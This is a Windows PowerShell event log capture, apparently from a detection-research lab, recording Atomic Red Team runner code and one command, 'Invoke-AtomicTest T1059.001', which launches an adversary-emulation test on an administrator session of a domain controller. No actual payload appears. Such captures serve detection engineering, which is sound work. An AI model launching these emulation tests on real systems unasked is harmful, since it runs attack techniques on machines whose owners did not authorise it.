Path: C:\Users\Administrator\Documents\WindowsPowerShell\Modules\powershell-yaml\0.4.2\powershell-yaml.psd1
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469354
Keywords=None
Message=Completed invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469353
Keywords=None
Message=Started invocation of ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469352
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Test-Path -Path $_ -Include '*.yaml', '*.yml' }

ScriptBlock ID: b459aaab-de7d-420a-80f5-5c41c18dff6a
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Get-AtomicTechnique.ps1
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469351
Keywords=None
Message=Started invocation of ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469350
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Invoke-AtomicTestSingle ($AT) {

            $AT = $AT.ToUpper()
            $pathToYaml = Join-Path $PathToAtomicsFolder "\$AT\$AT.yaml"
            if (Test-Path -Path $pathToYaml) { $AtomicTechniqueHash = Get-AtomicTechnique -Path $pathToYaml }
            else {
                Write-Host -Fore Red "ERROR: $PathToYaml does not exist`nCheck your Atomic Number and your PathToAtomicsFolder parameter"
                return
            }
            $techniqueCount = 0

            foreach ($technique in $AtomicTechniqueHash) {

                $techniqueCount++

                $props = @{
                    Activity        = "Running $($technique.display_name.ToString()) Technique"
                    Status          = 'Progress:'
                    PercentComplete = ($techniqueCount / ($AtomicTechniqueHash).Count * 100)
                }
                Write-Progress @props

                Write-Debug -Message "Gathering tests for Technique $technique"

                $testCount = 0
                foreach ($test in $technique.atomic_tests) {

                    Write-Verbose -Message 'Determining tests for target operating system'

                    $testCount++

                    if (-Not $test.supported_platforms.Contains($targetPlatform)) {
                        Write-Verbose -Message "Unable to run non-$targetPlatform tests"
                        continue
                    }

                    if ($null -ne $TestNumbers) {
                        if (-Not ($TestNumbers -contains $testCount) ) { continue }
                    }

                    if ($null -ne $TestNames) {
                        if (-Not ($TestNames -contains $test.name) ) { continue }
                    }

                    if ($null -ne $TestGuids) {
                        if (-Not ($TestGuids -contains $test.auto_generated_guid) ) { continue }
                    }

                    $props = @{
                        Activity        = 'Running Atomic Tests'
                        Status          = 'Progress:'
                        PercentComplete = ($testCount / ($technique.atomic_tests).Count * 100)
                    }
                    Write-Progress @props

                    Write-Verbose -Message 'Determining manual tests'

                    if ($test.executor.name.Contains('manual')) {
                        Write-Verbose -Message 'Unable to run manual tests'
                        continue
                    }

                    $testId = "$AT-$testCount $($test.name)"
                    if ($ShowDetailsBrief) {
                        Write-KeyValue $testId
                        continue
                    }

                    if ($PromptForInputArgs) {
                        $InputArgs = Invoke-PromptForInputArgs $test.input_arguments
                    }

                    if ($ShowDetails) {
                        Show-Details $test $testCount $technique $InputArgs $PathToPayloads
                        continue
                    }

                    Write-Debug -Message 'Gathering final Atomic test command'


                    if ($CheckPrereqs) {
                        Write-KeyValue "CheckPrereq's for: " $testId
                        $failureReasons = Invoke-CheckPrereqs $test $isElevated $InputArgs $PathToPayloads $TimeoutSeconds $session
                        Write-PrereqResults $FailureReasons $testId
                    }
                    elseif ($GetPrereqs) {
                        Write-KeyValue "GetPrereq's for: " $testId
                        if ( $test.executor.elevation_required -and -not $isElevated) {
                            Write-Host -ForegroundColor Red "Elevation required but not provided"
                        }
                        if ($nul -eq $test.dependencies) { Write-KeyValue "No Preqs Defined"; continue }
                        foreach ($dep in $test.dependencies) {
                            $executor = Get-PrereqExecutor $test
                            $description = (Merge-InputArgs $dep.description $test $InputArgs $PathToPayloads).trim()
                            Write-KeyValue  "Attempting to satisfy prereq: " $description
                            $final_command_prereq = Merge-InputArgs $dep.prereq_command $test $InputArgs $PathToPayloads
                            if ($executor -ne "powershell") { $final_command_prereq = ($final_command_prereq.trim()).Replace("`n", " && ") }
                            $final_command_get_prereq = Merge-InputArgs $dep.get_prereq_command $test $InputArgs $PathToPayloads
                            $res = Invoke-ExecuteCommand $final_command_prereq $executor $TimeoutSeconds $session -Interactive:$true

                            if ($res -eq 0) {
                                Write-KeyValue "Prereq already met: " $description
                            }
                            else {
                                $res = Invoke-ExecuteCommand $final_command_get_prereq $executor $TimeoutSeconds $session -Interactive:$Interactive
                                $res = Invoke-ExecuteCommand $final_command_prereq $executor $TimeoutSeconds $session -Interactive:$true
                                if ($res -eq 0) {
                                    Write-KeyValue "Prereq successfully met: " $description
                                }
                                else {
                                    Write-Host -ForegroundColor Red "Failed to meet prereq: $description"
                                }
                            }
                        }
                    }
                    elseif ($Cleanup) {
                        Write-KeyValue "Executing cleanup for test: " $testId
                        $final_command = Merge-InputArgs $test.executor.cleanup_command $test $InputArgs $PathToPayloads
                        $res = Invoke-ExecuteCommand $final_command $test.executor.name $TimeoutSeconds $session -Interactive:$Interactive
                        Write-KeyValue "Done executing cleanup for test: " $testId
                    }
                    else {
                        Write-KeyValue "Executing test: " $testId
                        $startTime = get-date
                        $final_command = Merge-InputArgs $test.executor.command $test $InputArgs $PathToPayloads
                        $res = Invoke-ExecuteCommand $final_command $test.executor.name $TimeoutSeconds $session -Interactive:$Interactive
                        Write-ExecutionLog $startTime $AT $testCount $test.name $ExecutionLogPath $targetHostname $targetUser $test.auto_generated_guid
                        Write-KeyValue "Done executing test: " $testId
                    }
                    if ($session) {
                        write-output (Invoke-Command -Session $session -scriptblock { (Get-Content $($Using:tmpDir + "art-out.txt")) -replace '\x00', ''; (Get-Content $($Using:tmpDir + "art-err.txt")) -replace '\x00', ''; if(-not $KeepStdOutStdErrFiles) { Remove-Item $($Using:tmpDir + "art-out.txt"), $($Using:tmpDir + "art-err.txt") -Force -ErrorAction Ignore }})
                    }
                    elseif (-not $interactive) {
                        # It is possible to have a null $session BUT also have stdout and stderr captured from 
                        #   the executed command. IF so then write the output to the pipe and cleanup the files.
                        $stdoutFilename = $tmpDir + "art-out.txt"
                        if (Test-Path $stdoutFilename -PathType leaf) { 
                            Write-Output ((Get-Content $stdoutFilename) -replace '\x00', '')
                            if(-not $KeepStdOutStdErrFiles) {
                                Remove-Item $stdoutFilename
                            }
                        }
                        $stderrFilename = $tmpDir + "art-err.txt"
                        if (Test-Path $stderrFilename -PathType leaf) { 
                            Write-Output ((Get-Content $stderrFilename) -replace '\x00', '')
                            if(-not $KeepStdOutStdErrFiles) { 
                                Remove-Item $stderrFilename
                            }
                        }
                    }
                } # End of foreach Test in single Atomic Technique
            } # End of foreach Technique in Atomic Tests
        }

ScriptBlock ID: 9977b850-34e8-42e4-a697-d3c6bfbce619
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Invoke-AtomicTest.ps1
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469349
Keywords=None
Message=Completed invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469348
Keywords=None
Message=Started invocation of ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469347
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Get-TargetInfo($Session) {
    $tmpDir = "$env:TEMP\"
    $isElevated = $false
    $targetHostname = hostname
    $targetUser = whoami
    if ($Session) {
        $targetPlatform, $isElevated, $tmpDir, $targetHostname, $targetUser = invoke-command -Session $Session -ScriptBlock {
            $targetPlatform = "windows"
            $tmpDir = "/tmp/"
            $targetHostname = hostname
            $targetUser = whoami
            if ($IsLinux) { $targetPlatform = "linux" }
            elseif ($IsMacOS) { $targetPlatform =  "macos" }
            else {  # windows
                $tmpDir = "$env:TEMP\"
                $isElevated = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
            }
            if ($IsLinux -or $IsMacOS) {
                $isElevated = $false
                $privid = id -u                
                if ($privid -eq 0) { $isElevated = $true }
            }
            $targetPlatform, $isElevated, $tmpDir, $targetHostname, $targetUser
        } # end ScriptBlock for remote session
    }
    else {
        $targetPlatform = "linux"
        if ($IsLinux -or $IsMacOS) {
            $tmpDir = "/tmp/"
            $isElevated = $false
            $privid = id -u                
            if ($privid -eq 0) { $isElevated = $true }
            if ($IsMacOS) { $targetPlatform = "macos" }
        }
        else {
            $targetPlatform = "windows"
            $isElevated = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        }
      
    }
    $targetPlatform, $isElevated, $tmpDir, $targetHostname, $targetUser
}

ScriptBlock ID: 09cb335e-396f-45bc-bf57-1b3b9cd655fd
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Get-TargetInfo.ps1
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469346
Keywords=None
Message=Started invocation of ScriptBlock ID: 51690bde-47a7-4a7f-87f1-05acb76b284c
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469345
Keywords=None
Message=Creating Scriptblock text (1 of 1):
Invoke-AtomicTest T1059.001

ScriptBlock ID: 51690bde-47a7-4a7f-87f1-05acb76b284c
Path:
06/15/2021 05:01:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469344
Keywords=None
Message=Completed invocation of ScriptBlock ID: a85bed97-9bbb-4097-beff-9d8cef80286e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469770
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469769
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469768
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469767
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469766
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function Write-ExecutionLog($startTime, $technique, $testNum, $testName, $logPath, $targetHostname, $targetUser, $guid) {
    if (!(Test-Path $logPath)) { 
        New-Item $logPath -Force -ItemType File | Out-Null
    } 

    $timeUTC = (Get-Date($startTime).toUniversalTime() -uformat "%Y-%m-%dT%H:%M:%SZ").ToString()
    $timeLocal = (Get-Date($startTime) -uformat "%Y-%m-%dT%H:%M:%S").ToString()
    [PSCustomObject][ordered]@{ 
        "Execution Time (UTC)"   = $timeUTC;
        "Execution Time (Local)" = $timeLocal; 
        "Technique"              = $technique; 
        "Test Number"            = $testNum; 
        "Test Name"              = $testName; 
        "Hostname"               = $targetHostname; 
        "Username"               = $targetUser
        "GUID"                   = $guid
    } | Export-Csv -Path $LogPath -NoTypeInformation -Append
}

ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Path: C:\AtomicRedTeam\invoke-atomicredteam\Private\Write-ExecutionLog.ps1
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469765
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469764
Keywords=None
Message=Completed invocation of ScriptBlock ID: cb282395-b3b7-421c-b202-1a21ef87f29d
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469763
Keywords=None
Message=Started invocation of ScriptBlock ID: cb282395-b3b7-421c-b202-1a21ef87f29d
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469762
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: cb282395-b3b7-421c-b202-1a21ef87f29d
Path:
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469761
Keywords=None
Message=Completed invocation of ScriptBlock ID: 35dcc549-8a73-4462-bb66-e64903dfd45e
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469760
Keywords=None
Message=Completed invocation of ScriptBlock ID: e8f78de0-4a62-4768-bfa0-d547a45537ef
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469759
Keywords=None
Message=Completed invocation of ScriptBlock ID: a64006bf-e6e3-45b4-9251-357b02a9c28b
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469758
Keywords=None
Message=Started invocation of ScriptBlock ID: a64006bf-e6e3-45b4-9251-357b02a9c28b
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469757
Keywords=None
Message=Completed invocation of ScriptBlock ID: 158ce016-e06d-44dc-acd5-bebbf7a83bda
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469756
Keywords=None
Message=Started invocation of ScriptBlock ID: 158ce016-e06d-44dc-acd5-bebbf7a83bda
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469755
Keywords=None
Message=Completed invocation of ScriptBlock ID: da7d39b0-d385-4bff-a356-eb9c8b97a4b8
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469754
Keywords=None
Message=Completed invocation of ScriptBlock ID: e03537f6-8c2a-4a6c-b471-1f53dc1dd100
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469753
Keywords=None
Message=Completed invocation of ScriptBlock ID: 0b5c9e33-1038-41d1-82dc-7eef3fbb54a8
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469752
Keywords=None
Message=Started invocation of ScriptBlock ID: 0b5c9e33-1038-41d1-82dc-7eef3fbb54a8
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469751
Keywords=None
Message=Started invocation of ScriptBlock ID: e03537f6-8c2a-4a6c-b471-1f53dc1dd100
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469750
Keywords=None
Message=Started invocation of ScriptBlock ID: da7d39b0-d385-4bff-a356-eb9c8b97a4b8
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469749
Keywords=None
Message=Started invocation of ScriptBlock ID: e8f78de0-4a62-4768-bfa0-d547a45537ef
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469748
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5424a9f7-d369-498b-991e-c0804bb922a7
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469747
Keywords=None
Message=Started invocation of ScriptBlock ID: 5424a9f7-d369-498b-991e-c0804bb922a7
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469746
Keywords=None
Message=Completed invocation of ScriptBlock ID: e8f78de0-4a62-4768-bfa0-d547a45537ef
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469745
Keywords=None
Message=Completed invocation of ScriptBlock ID: a64006bf-e6e3-45b4-9251-357b02a9c28b
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469744
Keywords=None
Message=Started invocation of ScriptBlock ID: a64006bf-e6e3-45b4-9251-357b02a9c28b
Runspace ID: f53a1cae-cafa-4873-ba65-31f6526efd74
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469743
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: a64006bf-e6e3-45b4-9251-357b02a9c28b
Path:
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469742
Keywords=None
